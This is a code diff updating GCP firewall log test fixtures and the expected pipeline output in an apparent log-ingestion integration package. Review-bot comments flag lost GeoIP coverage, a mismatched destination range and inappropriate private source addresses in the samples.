+{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"} +{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr 
Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"} +{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} 
+{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"} +{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol 
Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"} +{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} 
+{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 
+{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} 
+{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} +{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} 
+{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} 
+{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} 
+{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} 
+{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} 
+{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} 
{"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"10.42.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"}
diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json
index f992558affc..8448cb23c6b 100644
--- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json
+++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json
@@ -96,7 +96,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147348Z", + "ingested": "2021-12-09T13:37:43.705390900Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.142.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"12345667\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147368Z", + "ingested": "2021-12-09T13:37:43.705396900Z", "original": "{\"insertId\":\"1dobeotg13df9f7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.10\",\"dest_port\":57794,\"protocol\":6,\"src_ip\":\"10.142.0.16\",\"src_port\":80},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"892378332\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -216,23 +216,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -248,7 +237,7 @@ ], "network": { "name": "default", - "community_id": "1:iiDdIEXnxwSiz/hJbVnseQ4SZVE=", + "community_id": "1:9+6dmqk1gTfOBuneEQYO+4ye504=", "transport": "udp", "type": "ipv4", "iana_number": "17", @@ -268,7 +257,7 @@ "related": { "ip": [ "10.128.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { 
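Review bot: The regenerated `destination.geo` loses `location`, `country_iso_code` and the entire `as` block, keeping only `continent_name`/`country_name`, and those two values mirror the event's own `remote_location` rather than a lookup result. With 8.8.8.8 this sample exercised the pipeline's destination GeoIP/ASN enrichment; with 67.43.156.13 it apparently does not, possibly because the test database has no entry for it — worth confirming instead of accepting the regenerated file as-is. If enrichment of public destinations is intended behavior, either choose a replacement from the supported set that the test database resolves, or add a second EGRESS sample that keeps that path covered so a future geoip/ASN regression in the pipeline is still caught.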
@@ -304,8 +293,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147374100Z", - "original": "{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", + "ingested": "2021-12-09T13:37:43.705405800Z", + "original": 
"{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", "kind": "event", "action": "firewall-rule", "id": "4zuj4nfn4llkb", @@ -331,16 +320,16 @@ "continent_name": "Asia", "country_name": "omn" }, - "address": "192.0.2.126", + "address": "192.168.2.126", "port": 64853, - "ip": "192.0.2.126" + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" ], "network": { "name": "windows-isolated", - "community_id": "1:I+YM7Ru3rl0RVZt/y+F/hkoY0Zc=", + "community_id": "1:OdLB9eXsBDLz8m97ao4LepX6q+4=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -359,7 +348,7 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.42.0.2" ] }, 
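Review bot: The updated `event.original` for `4zuj4nfn4llkb` now carries `\"dest_ip\":\"67.43.156.13\"` but still `\"destination_range\":[\"8.8.8.0/24\"]`, so the sample describes an EGRESS DENY hit whose destination lies outside the range of the rule it quotes. The pipeline test does not check that relationship, but the fixture also serves as the reference for what a real firewall log looks like, and an internally inconsistent record can mislead anyone building detections or dashboards from it. Consider making the range match, e.g. `\"destination_range\":[\"67.43.156.0/24\"]`, in test-firewall.log and then regenerating this expected string; the same mismatch is present in the `tzddthfsr6fv5` and `1k2b7kefsnhzq7` records of the fixture hunk above, which starts outside this chunk.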
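Review bot: The source addresses move from 192.0.2.0/24 (RFC 5737 TEST-NET-1, reserved for documentation) into 192.168.0.0/16 (RFC 1918 private-use) while the surrounding sample still models Internet-sourced traffic — a `remote_location` of Oman for an RDP session admitted by a `0.0.0.0/0` INGRESS rule. A private source is semantically wrong for that record, and if the pipeline ever starts treating RFC 1918 space differently (for instance skipping GeoIP for private ranges), these samples would change behavior silently. If the tooling's supported public-IP set was the reason for leaving 192.0.2.0/24, prefer one of those supported addresses for the external peers (67.43.156.13 is already used elsewhere in this change) and keep private space for the in-VPC side. The same replacement appears in the hunks at -428, -524 and -620 below.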
@@ -399,8 +388,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147380200Z", - "original": "{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.0.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", + "ingested": "2021-12-09T13:37:43.705412100Z", + "original": 
"{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", "kind": "event", "action": "firewall-rule", "id": "1f21ciqfpfssuo", @@ -428,16 +417,16 @@ "city_name": "Krasnodar", "region_name": "Krasnodar Krai" }, - "address": "192.0.2.219", + "address": "192.168.2.219", "port": 2897, - "ip": "192.0.2.219" + "ip": "192.168.2.219" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:I0VuqgaYU1tgaECjlzIRuPzILlg=", + "community_id": "1:A5iOU96ubdRLq+4VydLZgZGU+Ns=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -456,7 